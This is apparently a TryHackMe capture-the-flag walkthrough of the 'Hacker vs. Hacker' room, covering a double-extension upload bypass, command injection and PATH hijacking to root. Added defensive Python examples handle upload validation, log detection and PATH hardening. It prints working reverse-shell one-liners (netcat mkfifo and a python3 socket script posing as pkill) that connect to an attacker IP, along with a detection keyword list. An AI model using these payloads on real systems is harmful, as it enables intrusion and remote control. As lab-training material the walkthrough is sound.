Hacker vs. Hacker

Try Hack Me Walkthrough

- ALi3nW3rX - 

Non Spoiler Nudge

  1. Check the source code
  2. Pay attention to the cvs directory
  3. Try echo -e in your own terminal
  4. There are some processes to look out for
  5. Make sure to look at the PATH

Attack Path

  1. Enumeration and FUZZING
  2. Command Injection
  3. File Path Injection

We are going to do a full walkthrough of Hacker vs. Hacker today, starting out with our normal nmap scan.

We get two ports, 80 and 22. Since we don't have any creds yet, we are going to move past port 22 for now. Let's have a look at the website on 80.

Okay, so we can upload something. This is most likely our way in, or at least a starting point for poking around.

I tried to upload a PHP rev shell with just a .php extension and as pdf.php, because the site says it only accepts PDFs. I had no luck with either, so now we know we have to do some fuzzing to find a way in.

Using Feroxbuster we get a few directories we can start to explore.

The /dist is disabled, so let's leave that one alone for now. /Images is nothing of real value. With the couple of clues about CVS, my suspicion is that CVS has a way in, so let's fuzz /cvs and see what we get.

After many, many attempts at fuzzing and coming up with nothing, I had to sit back and think for a second. If I was hacking into this machine, what would I do? I would upload a PHP file (which we tried), and it didn't work. But we also saw that it only accepts PDFs. So our next move was to rename the rev shell to shell.pdf.php and see if that works (we also tried this and it didn't work). So, let's try fuzzing ####.pdf.jpg? It's worth a shot at this point.

And looky, looky we got a cookie! Back to fuzzing!

After trying to fuzz 'SHELL'.pdf.php with no luck, I just started to manually enumerate the website. After a little bit of playing around, I got a hit on 'CMD'.
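The reason a name like shell.pdf.php gets through a "PDF only" form is usually a filename filter that only looks for the string ".pdf" somewhere in the name. The walkthrough never shows the server's code, so the weak check below is an assumption of that kind of filter, placed next to a hardened version that trusts only the last extension, refuses extra dots, and confirms the bytes actually start like a PDF. This is an added example, not code from the room or the post.

```python
"""Weak vs. hardened filename checks for a 'PDF only' upload form.

Added example, not the room's server code (the walkthrough never shows it).
The weak check is an assumed substring filter of the kind a name like
shell.pdf.php slips past; the hardened check trusts only the final extension,
refuses extra dots, and confirms the file really starts like a PDF.
"""
import hashlib
import os

ALLOWED_EXT = {".pdf"}
PDF_MAGIC = b"%PDF-"


def weak_is_pdf(filename: str) -> bool:
    """Assumed weak filter: passes any name that merely contains '.pdf'."""
    return ".pdf" in filename.lower()


def hardened_is_pdf(filename: str, head: bytes) -> bool:
    """Extension and content check that closes the double-extension gap."""
    base, ext = os.path.splitext(os.path.basename(filename))
    # Only the last extension counts, so "shell.pdf.php" is a .php file here.
    if ext.lower() not in ALLOWED_EXT:
        return False
    # Reject "shell.php.pdf" too: some web servers hand multi-extension names
    # to a handler for every extension they recognise, not just the last one.
    if "." in base or not base:
        return False
    # The first bytes must look like a PDF; a PHP stub does not.
    return head.startswith(PDF_MAGIC)


def storage_name(content: bytes) -> str:
    """Server-chosen name: the uploader's filename never reaches the filesystem."""
    return hashlib.sha256(content).hexdigest()[:32] + ".pdf"


def accept_upload(filename: str, content: bytes):
    """Return the stored name, or None when the upload is refused."""
    if not hardened_is_pdf(filename, content[:8]):
        return None
    return storage_name(content)


if __name__ == "__main__":
    # Constructed sample uploads: one real-looking PDF, two renamed PHP stubs
    samples = [
        ("report.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n..."),
        ("shell.pdf.php", b"<?php /* constructed stub */ ?>"),
        ("shell.php.pdf", b"%PDF-1.7 constructed fake header"),
    ]
    for name, data in samples:
        print(f"{name:15} weak={weak_is_pdf(name)!s:5} hardened={accept_upload(name, data)}")
```

Running it shows the weak filter waving shell.pdf.php through while the hardened path refuses both renamed files and stores the genuine PDF under a server-generated name, so nothing the uploader typed ends up as a path on disk.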

Alright, cool, we have some command injection! Let's get a shell in there. What I did was grab my one-liner rev shell command and URL-encode it on CyberChef.

💡 Just a side note here: you can do a lot with the command injection if you URL-encode everything. You can actually get the user flag and the lower credentials. I'm sure if you tried hard enough you could get much further.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.25.127 6666>/tmp/f

And we get the code below. We can just copy and paste this into our URL now.

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%2010%2E14%2E25%2E127%206666%3E%2Ftmp%2Ff
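From the blue-team side, the give-away for this step is a query parameter that, once URL-decoded, is a shell pipeline. The script below is an added detection example (not code from the walkthrough): it parses constructed combined-format access log lines, decodes each query value, and flags shell metacharacters and netcat/shell keywords. The timestamps and the /cvs/shell.pdf.php path are assumptions; the encoded cmd value is the one shown above.

```python
"""Spot URL-encoded command injection in web access logs.

Added detection example, not code from the walkthrough. The log lines are
constructed (combined log format, made-up timestamps and an assumed path for
the uploaded file); the encoded cmd value is the one from the walkthrough.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# client, identd, user, [time], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Characters that chain or redirect commands in a shell
METACHARS = re.compile(r"[;|&`]|\$\(")
# Strings typical of shell-spawn / reverse-connection payloads
KEYWORDS = re.compile(r"mkfifo|\bnc\b|\bncat\b|/bin/(?:ba)?sh|/dev/tcp|bash -i")


def analyse_line(line: str) -> list:
    """Return one finding per query parameter whose decoded value looks like shell."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    findings = []
    # parse_qs already undoes one layer of %-encoding; unquote once more so a
    # double-encoded payload is inspected in plain form as well.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            reasons = []
            if METACHARS.search(decoded):
                reasons.append("shell metacharacter")
            if KEYWORDS.search(decoded):
                reasons.append("shell/netcat keyword")
            if reasons:
                findings.append({
                    "ip": m.group("ip"), "time": m.group("time"),
                    "path": parts.path, "param": name,
                    "decoded": decoded, "reasons": reasons,
                })
    return findings


def scan_log(lines) -> list:
    """Run analyse_line over an iterable of log lines and collect the findings."""
    return [f for line in lines for f in analyse_line(line)]


# Constructed sample log: two benign requests and the injected one
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2022:10:14:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/May/2022:10:14:09 +0000] "GET /cvs/?file=report.pdf HTTP/1.1" 200 120',
    '10.14.25.127 - - [12/May/2022:10:15:33 +0000] "GET /cvs/shell.pdf.php?cmd='
    'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di'
    '%202%3E%261%7Cnc%2010%2E14%2E25%2E127%206666%3E%2Ftmp%2Ff HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["param"], f["reasons"])
        print("   decoded:", f["decoded"])
```

The decode-then-match order matters: the raw log line contains no ";" or "|" at all, so a rule that greps the log as written never fires. The same check works as a WAF rule or a SIEM parser step, and the decoded string is also what you want in the alert, since it is what the web server handed to the shell.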

We have our netcat listener set up on the other side waiting for a rev shell to come through.

Boom We are in!

First thing we are going to do is get a stable shell. But this does not work out too well for us.

Seems like the previous hacker has put some speed bumps in our way. Okay, cool, we just have to use this shell. No big deal if we lose it; we can simply re-run our netcat listener and refresh the website to get another shell.

We can easily grab the user.txt flag on this one. After this, the first thing we check is the .bash_history.

Oh! Looks like we have a password of some sort! Cool beans, let's examine this for a min. Not going to lie, this took me a few minutes to figure out, but if you look at the password line it uses the 'echo -e' command. The -e flag makes echo interpret backslash ('\') escape sequences in its argument. Let's run this in our terminal and see what the output is.

Okay, it looks like we have two of the same passwords and some type of hash. Just to let you know, this is not a hash of any kind that I could tell. So let's simply try to su lachlan with that password and see if it lets us in.

Sweet! We just elevated our privileges. Still got this shitty shell, but it will work for us! And yes, I tried to stabilize the shell again and still got the same result.

With that being said, since every time we try to stabilize the shell it gets knocked down, let's try to SSH in as lachlan now that we have a password and see if we can get a better shell.

Seems like our hacker friend is still messing with us. SSH is a no go.

One of the first things I look for on a machine is the processes running.

When we run ps aux we notice this process being executed, which looks a little suspicious.

What's interesting here is that sleep is running as /bin/sleep and nope is running as /usr/bin/echo, but pkill doesn't have a path, so it gets resolved through PATH. And these are all running as root. So, first we are going to try and place a rev shell named pkill in our user folder and see what happens.

There is a backup.sh script in our /bin directory, so let's try there first and see if renaming this and then adding our script to it gets us a shell as root.
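The root cause here is a root-run script that calls pkill by bare name while a user-writable directory sits early in the PATH that cron hands it. The walkthrough does not show the script itself, so the audit below works on a constructed script and PATH that mirror what it describes (sleep and echo by absolute path, pkill bare, a bin directory under the user's home first in PATH; /usr/bin/pkill is an assumed location). It is an added example, not the room's code: it lists every bare command, reports which writable directories are searched before the real binary, and emits a hardened copy with PATH pinned and the bare name replaced.

```python
"""Audit a root-run shell script for commands resolved through PATH.

Added example; the room's backup script is not shown in the walkthrough, so
SAMPLE_SCRIPT, SAMPLE_PATH and USER_WRITABLE are constructed to mirror what it
describes: sleep and echo invoked by absolute path, pkill by bare name, and a
user-owned bin directory early in PATH. REAL_BINARIES is an assumed location.
"""
import os
import re
import shlex

SAMPLE_SCRIPT = """#!/bin/bash
while true; do
    /bin/sleep 5
    /usr/bin/echo "nope"
    pkill -f "bash -i"  # argument constructed for the example
done
"""

# Constructed cron environment: a user-writable bin dir sits ahead of /usr/bin.
SAMPLE_PATH = "/home/lachlan/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
USER_WRITABLE = {"/home/lachlan/bin"}
REAL_BINARIES = {"pkill": "/usr/bin/pkill"}   # assumed location on the target

SHELL_WORDS = {"while", "do", "done", "if", "then", "else", "elif", "fi",
               "for", "in", "true", "false", "exit", "export", "set"}


def bare_commands(script: str) -> list:
    """Return (line_no, name) for every command invoked without an absolute path."""
    found = []
    for no, line in enumerate(script.splitlines(), 1):
        code = line.split("#", 1)[0].strip()      # drops comments and the shebang
        if not code:
            continue
        for segment in re.split(r"[;|&]+", code):   # 'a; b' and 'a | b' both count
            try:
                words = shlex.split(segment)
            except ValueError:
                continue                             # unbalanced quote: skip segment
            if not words:
                continue
            cmd = words[0]
            if cmd in SHELL_WORDS or "=" in cmd or cmd.startswith("/"):
                continue
            found.append((no, cmd))
    return found


def writable_before(path: str, real_binary: str, user_writable) -> list:
    """PATH entries searched before the real binary's directory that a user can write."""
    real_dir = os.path.dirname(real_binary)
    risky = []
    for d in path.split(":"):
        if d == real_dir:
            break
        if d in user_writable:
            risky.append(d)
    return risky


def audit(script: str, path: str, real_binaries: dict, user_writable) -> dict:
    """Map each bare command to the writable PATH dirs that could shadow it."""
    return {cmd: writable_before(path, real_binaries.get(cmd, "/usr/bin/" + cmd), user_writable)
            for _, cmd in bare_commands(script)}


def harden(script: str, real_binaries: dict) -> str:
    """Pin PATH right after the shebang and rewrite bare names to absolute paths."""
    lines = script.splitlines()
    for no, cmd in bare_commands(script):
        if cmd in real_binaries:
            lines[no - 1] = re.sub(rf"(?<![\w/]){re.escape(cmd)}\b",
                                   real_binaries[cmd], lines[no - 1], count=1)
    insert_at = 1 if lines and lines[0].startswith("#!") else 0
    lines.insert(insert_at, "PATH=/usr/sbin:/usr/bin:/sbin:/bin")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for cmd, dirs in audit(SAMPLE_SCRIPT, SAMPLE_PATH, REAL_BINARIES, USER_WRITABLE).items():
        print(f"{cmd}: shadowable from {dirs or 'nowhere'}")
    print(harden(SAMPLE_SCRIPT, REAL_BINARIES))
```

Either fix on its own closes the hole (a pinned PATH with no user-writable entries, or absolute paths for every command); doing both means a later edit to the script cannot quietly reopen it. The same audit run over /etc/cron.d and root's crontab is a cheap way to find this class of issue before someone else does.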

On our attacker machine, let's get a shell script ready and name it pkill.

You can use whatever editor you are comfortable with.
#!/bin/sh
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.25.127",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Now we are going to serve that up with a simple HTTP server from the file's location.

Back on our target machine, we are going to download it.

Okay cool it worked.

Now we have to make it executable.

chmod +x pkill

Okay, so let's get our netcat listener up and running on our attack machine.

Boom we are ROOOT!!

You have to work around the constant NOPEs being thrown at you, but luckily the root flag is right there and you can simply cat it out.

Hope this helped. Happy Hacking.